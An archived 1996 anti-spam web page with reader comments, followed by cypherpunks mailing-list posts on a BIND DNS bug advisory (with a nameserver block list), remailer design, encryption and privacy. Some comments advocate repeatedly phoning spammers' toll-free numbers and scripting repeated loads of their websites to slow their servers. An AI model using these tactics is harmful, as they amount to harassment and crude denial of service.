 The MAKE.MONEY.FAST scheme 

A direct descendant of the chain letters of old, this is the pyramid scam 
of the information age...  A quick look at the mathematics behind the 
idea will expose the scam.


 Phone-sex cretins 


They post a couple of lines of text-mode heavy breathing, and usually a 
1-800 number that you're invited to call.  Call the 1-800 number.  
Really.  It costs them money every time you do!  They make their money 
via the 1-900 number that they ask you to call next.  So just call the 
1-800 number again.  And again.  And again.








<a href="http://www.metareality.com/~nathan/visit.cgi/html.Spam"
>[Fighting Spam]
 :

[Graffiti]
 :

[Home]
 :

[Limericks]
 :

[Linkage]





Don't just browse here, say something!
Speak your mind in this space here:

<input type=submit 
	value="Press here to have your words added to the page.">



 The true beauty of Usenet is the way it allows free communication.
You can be rich/poor/ugly/
 religious/atheist or a member of any
race/religion or be young/old... That's the wonder - everyone can talk to
one another and share ideas.
 Then spam comes along. It fills up
newsgroups with so much noise that no one reads it any more. That

wondrous method of communication has been lost. That's why I hate spam. 



 You just don't get it, do you?

 No, deleting one piece of email doesn't take much.  Then again,
neither does appealing to a system administrator to have the
spammer shut down.  Two or three bits of junk a day really is something 
I can live with, but I don't want to.  So why should I?  

Two or three bits of trash by the roadside won't mean the end of
the world.  Tossing empty cans out the window costs less than having your
trash hauled away - what a great opportunity to save money!  If litter
were acceptable, a public beach would be no place to spend an afternoon. 

 Postal mail costs the sender with each mailing.  This keeps junk
postal mail to tolerable levels. EMail costs the sender maybe
$20/month, period.  Are you so fucking stupid that you don't
realize what a cesspool the net would be if this were allowed to grow
unchecked? 

-NW


 People complain about spam and mass E-mailers.  But my question is:

what's the big deal?  Does it REALLY take THAT much PRECIOUS time out

of your day to click and delete a piece of E-mail? I think that the

people complaining about others taking advantage of an excellent

business opportunity ought to just relax a bit.  And just HOW does it 

COST you to deal with SPAM?  With ISP's dropping access prices and

providing unlimited access to the internet, how could it possibly

COST someone to get an E-mail message?  I think you people really need

to just kick back and relax already.  Geeze, if it wasn't SPAM what

else would you find to complain about?




 Spam isn't about content, spam is about quantity and cost shifting.  

TV spam would be the same ad on every channel at the same time.

Print spam would be junk mail sent postage due or charge-on-delivery.

With the ads on TV and in newspapers, the advertisers pay the expenses 
associated with publishing their ads.  With net spam, the recipients pay the 
expenses associated with carrying the ads.  That is the key difference.  

The costs of ads in traditional media help to support the very media that
deliver the ads.  With net.spam, there are no costs, and the ads just
serve to sap the medium.  All you need is a free trial account (AOL,
interramp, or earthlink, etc are famous for this), and you can broadcast a
huge amount of spam before anyone notices.  Or, you can pay for an account
with MCI, and broadcast huge amounts of spam for 30 days after the
sysadmins realize what's going on. 

-NW 


 Net-based spam is not the only form of spam. There is spam in print

and spam in TV advertising. Wouldn't you say every Calvin Klein ad

on TV, magazines or billboards is spam? How about Budweiser,

Lite beer, and McDonalds commercials.



If you see any type of advertising that offends your senses, you

should feel free to boycott the products, ask your friends to

boycott the products, etc. If the company has an 800 number or

web site, let them know that you find their advertising offensive.




 I am really, really, REALLY tired of being solicited to buy things 

whenever I log on to my computer. I mean, I pay for the phone line, 

the software, the hardware, the accounts and my time is worth money 

as well. I get a LOT of e-mail and a SIZEABLE portion of it is junk 

e-mail. When I read news, about 10% of it is junk e-mail; more if it

is a small newsgroup. I want to know what uninformed idiot is selling

my address, or where these people are GETTING it. I have never bought

anything over the computer. I have bounced unsolicited junk back to

the people who send it. (I love how righteously indignant these people

are: they send you mail and expect you to buy something from them and

when you fail to perform as expected with joy and gratitude...if you 

should, in fact, protest them wasting your time and resources...they

get downright rude and abusive. The presumptuousness of it just really

annoys me.) The capper is that I did some artwork for the anti-Canter-

and-Siegel "Green Card Lawyers" tees Joel Furr was offering a while ago.

The ultimate clue that I am not interested in spam of any sort, but how

could they know? It's just amusing. Let it be known that I am not a

test market, nor will I buy any of your crap, be it face cream, thigh

cream, green cards, stock options, modems, books, herbs, or the golden

goose itself. Not interested. I don't know you, I have no reason to trust

you, and you are spamming MY mailbox and expecting ME to reward this with

money. No, thank you. I've been online for more than 5 years, and I 

really long for the "good old days" before the Net was "cool".



There ya go. My tuppence. Now...where do I go to put my name on the

"Don't Send This Person Crap Mail" list? (Laugh)






 SPAM is only going to go away if we make sure companies learn that SPAMming doesn't get costumers to buy thier products and it does more to stop potential costumers from buying thier products.


 I've heard a couple of different conflicting stories about the origins of the use of the word spam in this context.  




The most popular version suggests that is was inspired by the
Monty Python skit in which virtually every item on some restaurant's menu
includes spam in some form or other.  The waiter's recitation of the menu
becomes unintelligible except for '...and spam, spam with..., spam salad,
...with spam, spam mixed with..." and so on.  It really picks up when the
Vikings start chanting "spam-spam spam, spam, spam-spam spam, spam...." ad
nauseum.  This is what the net would be like if this stuff was allowed to 
continue unchecked.  If that's not a horrifying thought, maybe you should 
see the skit in question.

My personal belief is that geeks (who make up much of the 'net
community (myself included), much of Monty Python's audience, and probably
most of Monty Python's cast) just tend to use the word spam when more
appropriate words don't come to mind readily.  For no particularly good
reason, it really stuck this time.


-NW


 Due to popular demand, I've expanded the first couple of paragraphs to 
better explain what spam is and why it's such a pain in the ass.  

Personally, I'm getting two to five unsolicited email messages every week.  This is up from approximately zero unsolicited messages per week a few years ago when I first started using the Internet and Usenet.  It's a trend that has been steadily increa





sing, especially for the last year or two.  It's a trend that really really worries me.  It's a trend that is, worst of all, wasting my time!

-NW


 I an working on a Usenet news server designed to filter spam from

a news feed and quietly drop it.  Announcements in due course (next

few months) but if anyone wants to help with other platforms and

live feed debugging please 
mail me.


 Wow! Thanks for the help. I'll certainly become an anti-spam activist

and use your information to good effect.


 I don't get it! What is SPAM?


 Pardon my ignorance but what does "SPAM"ming mean?

"SICK PEOPLE AGAINST MAIL"???


 For the Spammers that have a web page I visit it with a macro every time that

I leave my system idle while connected for more then 5 min. This way at least

I'm sucking down their site and causing their site to slow down so those that 

are interest get bored waiting for an over taxed server to show them just what

They get for "ONLY $9.99 A MONTH!!!!" and leave with out buying. 

The only reason they have the site is to make money. No Money, No Site, No Spam.




 Very nice -- I like the idea of dialing the 800 number in the ad.  One

might wish to be sure to mention (if there's a message taker or, even

better, a human at the other end) that you saw their ad in (insert

newsgroup here) -- and no, you're not interested in buying anything,

you just wanted to see what they had.



Unfortunately, every time you call the 800 number, chances are you're

also adding your own phone number to a database that will result in

your receiving "junk phone calls" on a variety of useless subjects.



Solution?  Make the calls from a pay phone, ideally one that doesn't

accept incoming calls.




 Isn't spam remarkably like the countless hours of television (including but not limited to advertisements) that most of us watched in our childhoods?  And to think, whoever controls the information going to the youth of the nation controls the future






 of the nation.  Greedy, stupid corporations played a central role in molding us and shaping our opinions, attitudes, and perspectives.  Something to think about, perhaps... 








<a href="http://www.metareality.com/~nathan/visit.cgi/html.Spam"
>[Fighting Spam]
 :

[Graffiti]
 :

[Home]
 :

[Limericks]
 :

[Linkage]



n a t e s c a p e </a
>@<a
href="http://www.metareality.com/"> m e t a r e a l i t y . c o m



This page last updated Aug 21
Comments last updated Aug 22


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Tue, 27 Aug 1996 10:05:17 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: bot at anon.penet.fi
Message-ID: <199605150537.FAA00496@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


C'punks,

I posted the contents of a web site containing netspam stuff to cypherpunks. 
In the transaction a bot at anon.penet.fi caught my mail (thought it was a 
copy of the infamous Make Money Fast chain) and posted me a FAQ and bounced my
message. (Though it seems to have reached cypherpunks already)

-Vipul
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Tue, 27 Aug 1996 10:24:51 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Nuke attack? No, bug in DNS! (fwd)
Message-ID: <199605160122.BAA00187@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


I think this is the main cause of all strange things happening on the
net for last few days. 

Vipul

Rishab A. Ghosh Wrote : 
> Was I the only one nuked by the DNS/BIND crash yesterday? I hope
> I've not been automatically unsubscribed from the list. As not
> everyone here reads c.p.tcp-ip.d I've attached Karl Denninger's
> analysis. For those who were luckily immune, my ISP (best.com) like
> many others, had it's DNS crash for _local_ domain names (belonging
> to the ISP and customers like me) through most of yesterday. No,
> not a virus, but bad DNS records "floating around" as Karl puts it,
> that happened to expose a bug in the latest version of BIND.
> 
> So much for immunity to nuclear war!
> 
> Rishab
> 
> > From: karl@MCS.COM (Karl Denninger)
> > Newsgroups: comp.protocols.tcp-ip.domains
> > Subject: SERIOUS PROBLEM WITH DNS SERVERS AND BAD RECORDS - Rev 4.9.4
> > Date: 23 Aug 1996 10:10:39 -0500
> > Organization: MCSNet Ops, Chicago, IL
> > Message-ID: <4vkhlf$u4@Jupiter.mcs.net>
> > 
> > CAUTION!
> > 
> > There are a series of bad nameserver records floating around on the net
> > which are blowing up BIND versions 4.9.4 (REL and T5B) and possibly other
> > releases as well.  
> > 
> > This has been VERIFIED to be impacting multiple ISPs and their DNS servers.
> > 
> > We are shutting off updates from ANY DNS server which presents bogus data,
> > which stops it from killing our code, but is of no help to the large number
> > of domains which are presumably rendered unreachable.
> > 
> > At present, this list is:
> > 
> > bogusns 204.94.129.65 158.43.192.7
> > ;
> > bogusns 199.3.12.2 38.241.98.5 199.71.224.105 206.215.3.10
> > bogusns 134.75.30.253 198.41.0.4 128.63.2.53 198.41.0.4
> > bogusns 206.66.184.11 206.66.104.37
> > ;
> > bogusns 163.173.128.6 163.173.128.254 200.6.39.1 192.33.4.12 128.174.36.254
> > bogusns 129.79.1.9 128.174.5.58
> > 
> > 
> > All of these have presented at least one malformed record to us in the 
> > last two hours!
> > 
> > Folks, if you run one of these servers, start tracking down the problem on
> > your end.   If this is bad cached data, THOSE AFFECTED MUST FLUSH IT
> > AS SOON AS POSSIBLE TO TRY TO PREVENT PROPAGATION.
> > 
> > This problem started as an isolated set of incidents yesterday, and is now
> > spreading like wildfire.
> > 
> > The actual bad data appears to be a domain name being returned in an 
> > authority record which is of the form "domain.com<tab>com".  We have not
> > yet caught a bad returned record in a debug file; that is being attempted
> > now.
> > 
> > When this goes through "dn_expand" in the BIND code, it causes memory
> > arena corruption and subsequent failure to resolve VALID zones which you 
> > are authoritative for.  First signs are reports of "corrupted authority data"
> > if you are using "dig" to check zones which you hold authority records for.
> > 
> > We are working on a way to "harden" the code against this kind of junk data,
> > but until we can get one deployed our defense is to shut down communication
> > from those who are presenting us the garbage.
> > 
> > PLEASE CHECK YOUR NAMESERVERS OUT AND TAKE NECESSARY STEPS YOURSELF!  This
> > is a serious problem which has the possibility of melting significant parts
> > of the Internet infrastructure.
> > 
> > --
> > --
> > Karl Denninger (karl@MCS.Net)| MCSNet - The Finest Internet Connectivity
> > http://www.mcs.net/~karl     | T1 from $600 monthly; speeds to DS-3 available
> > 			     | 23 Chicagoland Prefixes, 13 ISDN, much more
> > Voice: [+1 312 803-MCS1 x219]| Email to "info@mcs.net" WWW: http://www.mcs.net/
> > Fax:   [+1 312 248-9865]     | Home of Chicago's only FULL Clarinet feed!
> > 
> > 
> > -- 
> >  bryant durrell                             http://www.innocence.com/~durrell
> >         durrell@innocence.com              http://www.innocence.com/fengshui
> >         durrell@bofh.net                  http://www.innocence.com/shadowfist
> >  big black nemesis parthenogenesis no one move a muscle as the dead come home
> > 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 1 Jun 1996 16:10:50 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Statistical analysis of anonymous databases
In-Reply-To: <v02120d14add55f5f9a05@[192.0.2.1]>
Message-ID: <Pine.SV4.3.91.960601005207.7211D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain




> In medical research, third party audit, i.e., the Department of Health and
> Human Services, is often required. A simple pseudonym picked by the patient
> won't do.

   It's not clear to me that the second sentence follows from the first.

   All the time, in medical or official identification situations 
(clearances,  weapons permits, etc) I'm asked how tall I am. I can't 
remember ever being measured. Thus, the answer I give about my height, 
might as well be "made up" by me.

I guess they do have to bother measuring homocide victims - they can't 
talk......




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 1 Jun 1996 12:53:30 +0800
To: cypherpunks@toad.com
Subject: NRC Report, 4, 5, 6
Message-ID: <199606010123.BAA15381@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Part II    Policy Instruments 
 
    
   Chapter 4  Export Controls 
 
      http://pwp.usa.pipeline.com/~jya/nrc04.txt  (163 kb) 
 
 
   Chapter 5  Escrowed Encryption and Related Issues 
 
      http://pwp.usa.pipeline.com/~jya/nrc05.txt  (144 kb) 
 
 
   Chapter 6  Other Dimensions of National Cryptography Policy 
 
      http://pwp.usa.pipeline.com/~jya/nrc06.txt  (85 kb) 
 
   --------- 
 
   Tomorrow: 
 
   Part III   Policy Options, Findings and Recommendations 
 
   Chapter 7  Policy Options of the Future 
   Chapter 8  Synthesis, Findings and Recommendations 
    
   14 Appendices 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 1 Jun 1996 16:14:22 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: FTC online workshop on privacy
Message-ID: <199606010555.BAA24442@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 23 May 96 at 7:46, Declan B. McCullagh wrote:
[..]
> More to the point, the left and the right come together on privacy issues.
> 
> Remember the Christian Coalition's take on national ID cards? "Mark of
> the Beast!" (Does anyone have an original cite for this? I also recall
> the CC opposing Clipper...)

There was actually a pretty good special on the 700-Club when Clipper 
first came out (at least from a transcript posted on the comp.org.eff 
newsgroup).

Yep. They were against it.

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 1 Jun 1996 16:27:16 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: The Political Map [NOISE?]
Message-ID: <199606010555.BAA24446@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 23 May 96 at 9:45, Bill Frantz wrote:

> This is because any analysis of political opinion that tries to reduce it
> to a one dimensional metric is ipso facto wrong.  Two dimensions gives you
> a much better match.  (Try personal freedom on one axis and economic
> freedom on the other.)  I suspect the more dimensions you include, the
> better you analysis will be.

Just two dimensions?

I'd be cautious of the personal freedom scale, since many groups 
aren't consistently in one place there.  Certain groups assign 
priorities to some freedoms over others, as well as who those 
freedoms apply to, etc.

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 1 Jun 1996 16:35:23 +0800
To: pcw@access.digex.net (Peter Wayner)
Subject: Re: The Anti-Briefing...
Message-ID: <199606010555.BAA24461@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 24 May 96 at 10:12, Peter Wayner wrote:

> I'm sure the "Briefing" is quite impressive and it includes
> several strong arguments for government surveillance. There are
> bound to be more than a few kids that are alive today thanks to
> eavesdropping and the quick thinking of folks in FBI, NSA et al.
> 
> That being said, I'm sure that there is also an "anti-Briefing"
> that can be given that illustrates that the huge cost of
[..]

So where did J.Edgar Hoover's infamous "Blue Files" go?
Then again, what about the alleged pictures of him wearing a dress 
and going down on his (male) companion?

It seems invoking the name of L.Ron Hoover and the Church of 
Applientology does plenty for an 'anti-briefing'.

> redesigning the phone system and forcing businesses and people
> to operate without protection. Here are some examples from the
> recent press that I think are good arguments for why strong
> crypto won't change the status quo.

On the contrary.  Much of the status quo needs to be changed.

[..]
> Some might argue that if weak crypto can save one child's life
> than it is worth it. This is a strong, sentimental argument, but

Worth what? Ruining his life when he becomes an adult? Or preventing 
him from ever becoming an adult?


--Mutant Rob.


 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Sat, 1 Jun 1996 19:27:17 +0800
To: cypherpunks@toad.com
Subject: Re: Where does your data want to go today?
Message-ID: <199606010706.DAA29049@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Me:
> >Using a random IV also limits the effectiveness of using known
> >headers for "known plaintext" attacks.  Also note that a good block
> > cipher isn't that vulnerable even to "known plaintext" attacks.

Bill Frantz: 
> I don't think this is true given a brute force attack.  Let me
> assume DES-CBC as a specific system.  Let us assume that the
> plaintext is:
> 
<snip>

> The brute force system decrypts the first, and second blocks (8
> bytes each) of the cyphertext, XORs them, and compares the result
> with "PKZIP2.1".  If the comparison is equal it has the key.
> 
> If we eliminated the header and just started with the compressed
> data, then the brute force system would have to decrypt and
> decompress enough of the data to run statistical tests.  The cost of
> the additional decryptions, decompression, and statistical tests
> substantially raise the cost of the brute force attack.

I will concede that having a known header, such as a PKZIP header,
does weaken a crypto to certain degree, but I still believe that it is
not a significant problem.  Here's why:

1. If the best attack against the crypto system is to brute force
attack (having to decrypt two blocks per key) I don't consider that a
weakness. Assuming you are using IDEA or another 128 bit key algorithm
and if everyone in the world owned two computers, each powerful enough
to make a million attacks a second, and they all decided to cooperate
in cracking your key it would still take (on average) until the next
ice age to complete this attack.  Admittedly DES wouldn't hold up
nearly as well, but if you are using straight DES you have bigger
concerns than the occaisional known plaintext attack.

2. Known plaintext is something that you have to assume that your
enemy has at least occaisional access to.  Lots of messages have known
beginnings and endings.  Sure it would be nice to reduce the amount of
known plaintext, but I think there are much more significant concerns.

3. The disadvantages of not having the headers.  The headers are
there for a reason: to communicate that the following file is in a
specific format.  Without the headers, you have to use another secure
channel to communicate what file type is being transmitted.

Again, I concede that a crypto system would be more secure if no
known plaintext was ever transmitted, such as compressed file
headers.  But this minor loss of security is nearly inescapable and
also relatively insignificant.

David F. Ogren
ogren@concentric.net
PGP Key ID: 0xC626E311
PGP Key Fingerprint: 24 23 CD 15 BF 8D D1 DE  81 71 84 C8 2C E0 4B 01
(public key available via server or by sending a message to
ogren@concentric.net with a subject of GETPGPKEY)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMa/qu/BB6nnGJuMRAQH8MAP/epcVGiS+9U1aWs1diuiVsMSjellYRjNm
p9huFrzT9eaBrfVz0MI2yhZ8IWNctDWznQdmtcmdRKoFm5Knfu+vIyKH6oILplyB
dgfPsSh3R/pJKXs2hD4q8PgE+laaTyFZyW1MqPbAjlKUS/T1w9bhL3lQnsrKZPf+
Qyxa19Vlya0=
=sHIE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brendon Macaraeg <bqm1808@is.nyu.edu>
Date: Sat, 1 Jun 1996 19:35:57 +0800
To: cypherpunks@toad.com
Subject: Re: [Off-Topic]  "Curfews"
Message-ID: <1.5.4.32.19960601090003.006cec9c@is.nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain


hi Tim and all:

Been lurking on this list for about a month
and find it really interesting. I'm still working
my way through the FAQ from the talk.politics.crypto
newsgroup to get up to speed, but have been
using PGP for about six months now.
I've been toying with starting an anon-remailer
as well....that Quickremail program looks
cool...anyone install and run it yet?

I think Tim's post relates to the idea
that we're living in a society that finds
it acceptable to monitor our movement
of all sorts. Not just physical, but --for lack of
a better word-- virtual as
well. By that I mean, organizations both
large and small have the means to track
our purchases and activities --generally, any
activity that is logged or leaves a data/paper trail
says something about us and creates a virtual
persona-- and using
such info. to make inferrences about
our lifestyles. 

Just the other day I had a heated talk
with someone about drug tests in the workplace.
She said they're fine. Frankly, I am against them. 
Take your jar and shove it. "Life, Liberty, and 
the Pursuit of Happiness" implies a right
to privacy.  That's why I started using PGP
and want to make an effort to keep up on 
topics related to keeping my life private
and shielded from those who would like otherwise.

What will employers want to know
next? What movies I rent? What books and magazines
I read? What else do I do on my freetime that
may or may not be "unacceptable"?
I  worry that our personal lives are becoming
more and more regulated by government,
regulation that allows employers and other
institutions to rationalize their privacy-invading actions
and that's why I too find Clinton's push for 
a state-instituted curfew disturbing as well.
What next? Will my employer start telling me
I have to be home by 11 p.m. so I can be
a happier, more productive worker?

-B



At 07:08 PM 5/31/96 -0700, you wrote:
 
>
>As I said, should such curfews become widespread, children will of course
>need forms of age identification, and this opens yet another door for
>universal I.D. cards. And for "travel papers."
>
>Maybe it would be easier to just put a tattoo on their arms--especially as
>the younger generation is so into tattoos these days. "Pappieren, bitte.
>Macht schnell!"
> >
=====================================================
                                    Brendon Macaraeg
               http://www.itp.tsoa.nyu.edu/~brendonm 
    Finger macaragb@acf2.nyu.edu for my PGP Public Key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 1 Jun 1996 20:44:22 +0800
To: cypherpunks@toad.com
Subject: Cassidy's Sacremento Bee article.
In-Reply-To: <Pine.3.89.9605312321.A10893-0100000@world.std.com>
Message-ID: <v03006f01add5c56be57f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


As I said here before, cypherpunk (and DCSB founder) Peter Cassidy, who did
an article in the last Wired on the Bernstein case, just did a story on the
NSA's involvement in the digital telephony bill in this Sunday's Sacremento
Bee.

Pete says,

> I spoke with an editor at the BEE. The story takes up most of the front
> section of the FORUM section. Headline screams:
> SILENT COUP IN CYBERSPACE
> US Intelligence Agencies Threaten Businesses and Personal Privacy.

Since this story is also supposed to hit the wires, it would be interesting
if it goes anywhere else...

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 1 Jun 1996 21:01:24 +0800
To: cypherpunks@toad.com
Subject: Paper about legal aspects of electronic cash
Message-ID: <v03006f05add5cbd1666a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


From: "Simon Schlauri" <schlauri@pobox.com>
To: "ecash@digicash.com" <ecash@digicash.com>
Date: Sat, 01 Jun 96 11:56:48
Reply-To: "Simon Schlauri" <schlauri@pobox.com>
Priority: Normal
Subject: Paper about legal aspects of electronic cash
Sender: owner-ecash@digicash.com
Precedence: bulk

Hello all

I'm a law student at the University of Zurich, Switzerland. During the last
months I've been
working on an paper about legal aspects of electronic cash, in which
DigiCash's ecash is one
of the two main models I examined. The main part of the paper consists of a
thesis on the
qualification of ecash as an analogy to bank cheques or private banknotes
based on digital
documents. The paper contains a large list (40 items) of further
literature, too.

This paper is now available via Internet at the following Address:
http://www.inf.ethz.ch/department/IS/ea/iur/1996/Arbeiten.html with a link
to the file
ftp://ftp.inf.ethz.ch/pub/org/ti/ga/Patru/legal/1996/schlauri.ar.ps

(PostScript, 36 pages, about 370K. The paper is written in German.)

I'm looking forward to your comments.

Regards

Simon Schlauri


______________________________
Simon Schlauri
St.Gallen, Switzerland

schlauri@pobox.com
http://www.pobox.com/~schlauri

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 2 Jun 1996 00:39:01 +0800
To: cypherpunks@toad.com
Subject: Re: Remailer chain length?
Message-ID: <199606011336.IAA11002@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi Scott,

Forwarded message:

> Subject: Re: Remailer chain length? 
> Date: Fri, 31 May 1996 14:55:58 -0500
> From: Scott Brickner <sjb@universe.digex.net>
> 
> >If this is strictly true, why not simply run several instances of a remailer
> >on the same machine. Then randomly chain them prior to sending them off
> >site. This would be a lot cheaper and faster than trying to convince
> >hobbyist to set it up or businesses to to use their profit & legal council.
> 
> Because it's not strictly true.  Implicit in traffic analysis is looking
> at the "envelopes" of the traffic.  Since this means intercepting those
> envelopes, once you've put your monitor on the first remailer at a site,
> you've probably gotten all the rest at the site for free.
> 
> I don't think multiple remailers at the same site help anything.
> 

I agree completely. If traffic analysis is going to be done on a single box
it isn't going to matter how many remailers are there.  The monitor will
simply grab them all. At this point it simply maps them thusly:


      incoming message > remailer #1 > .... > remailer #n > outgoing


That this really maps to is obvious:


      incoming message > remailer #1-#n > outgoing


The only thing this does is increase the number of valid entries in the
From: field. Succesful traffic analysis does not require that the From:
field contain only a single item. As a matter of fact it makes no difference
what the headers contain unless the body is put in some kind of envelope for
final delivery. Why? Because all one has to do is look at the body of the
text which will not have changed. This leads to a simple model, based on a
physical remailer:

        1. Physical remailer receives an evelope addressed to them.
        2. They open it and find a $1 money order (for paying the remailer)
           and another envelope with another delivery address on it.
        3. Remailer puts $1 in bank and the interior letter in the mail.

To convert this to electronic means:

        1. Remailer receives a email that is encrypted except for the
           header.
        2. Remailer decrypts mail (ie removes the outer envelope) and
           find three items, block of encrypted data (ie inner envelope)
           with header to next site and e$ token for $1.
        3. Remailer sends the data on its way.

There are a couple of points to be made.

        1. No traffic is handled in the clear except for the header to
           the current destination all others are nested in encryption.
        2. Remailer chaining is handled entirely by the customer
           (ie customer addresses the envelopes)
        3. $1 is the smallest amount normaly accepted as a fee for a
           valid contract.
        4. Remailer can't look at data because there is no way to find the
           correct sequence of keys to unlock the nested encryption.
        5. Automaticaly limits spamming unless a remailer allows cloning
           AND all recipients share a commen private key.
        6. It maps 1:1 onto the physical remailer model with the same limits
           on information at each stage. This allows one to directly apply
           the current history of precedence involving anonymity and
           physical remailers.

Under todays current legal and social structure this is the only model that
will prevent remailers from being held accountable for their traffic and at
the same time provide enough income to keep legal protection at hand. Note
that I am not saying you still can't be brought brought up on charges,
simply that you (as a remailer) now have the structure in place to fight it
succesfuly.

This is the basic model that the Austin Cypherpunks are working on at the
currrent time. The big problem we have right now is determining if the body
is actualy encrypted. We have done some basic tests of encryption-spoofing
using pgp and it is looks to be a thorny problem. It simply is not trivial
to look at a block of characters and determine if they are actualy
encrypted. You can't rely on the wrapper around the data put there by the
encryption program because this can be kept intact and the data changed. As
long as the checksum matches it all looks the same. Even if the test is done
with a dictionary  this won't help because rsa does not guarantee that once
the data is encrypted that the output would be gibberish, sort of like the
"All the monkeys in the world typing create Shakespeare" story. It is
completely feasible (though unlikely) for the encrypted text to be something
meaningful in some language or another.


                                                      Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 2 Jun 1996 00:43:25 +0800
To: cypherpunks@toad.com
Subject: Fairness, Justice, and Cypherpunks (fwd)
Message-ID: <199606011349.IAA11019@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi Tim,

Forwarded message:

> Date: Tue, 28 May 1996 13:55:36 -0700
> From: tcmay@got.net (Timothy C. May)
> Subject: Fairness, Justice, and Cypherpunks
> 
> Several recent messages have raised issues about "ownership of
> information," "compilation of dossiers," and the (putative) imbalance
> between personal power and corporate power (which some think justifies
> denying corporations certain basic rights or Constitutional protections).
> 

Businesses (and government) have no rights under the Constitution and should
enjoy no rights under the Constitution. Rights are the sole purvue of real live
human beings (ie individuals) and not groups or paper individuals (stupidest
idea I have ever seen in the legal field). It is not reasonable to support
a motion which allows a group to have the same or possibly more rights than
the individuals that make it up.

Business should not get the right to vote, they should be completely
prohibited from being involved in politics even to the point of making
contributions to politicians. Eisenhower once warned this country of the
military-industrial complexes threat, we have ignored it to date.


                                                    Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sun, 2 Jun 1996 00:23:21 +0800
To: cypherpunks@toad.com
Subject: Re: [Off-Topic]  "Curfews"
Message-ID: <m0uPqIz-00035RC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:08 PM 5/31/96 -0700, Timothy C. May wrote:
>Cypherpunks,
>
>This is off-topic for the list, but I want to share it anyway. It touches
>on issues of increasing police surveillance, and also touches on the issue
>of "age credentials" (in the sense that how else is a cop who stops a young
>person for "curfew violation" to determine if a violation has occurred when
>most 14- and 15-year-olds carry no driver's licenses?)
>
>The "curfew" meme is spreading quickly, with Clinton calling for a federal
>curfew, at least in cities, and Dole trying to outdo him with even more
>draconian curfew laws. Many communities already have them, including San
>Jose, New Orleans, and other large cities. And my own community, Santa Cruz
>County, ironically begins a curfew program on Saturday, tomorrow.
>
>I wrote this item for our local newsgroup, scruz.general, announcing that
>"my household" will not abide by this law. I didn't come out and say "my
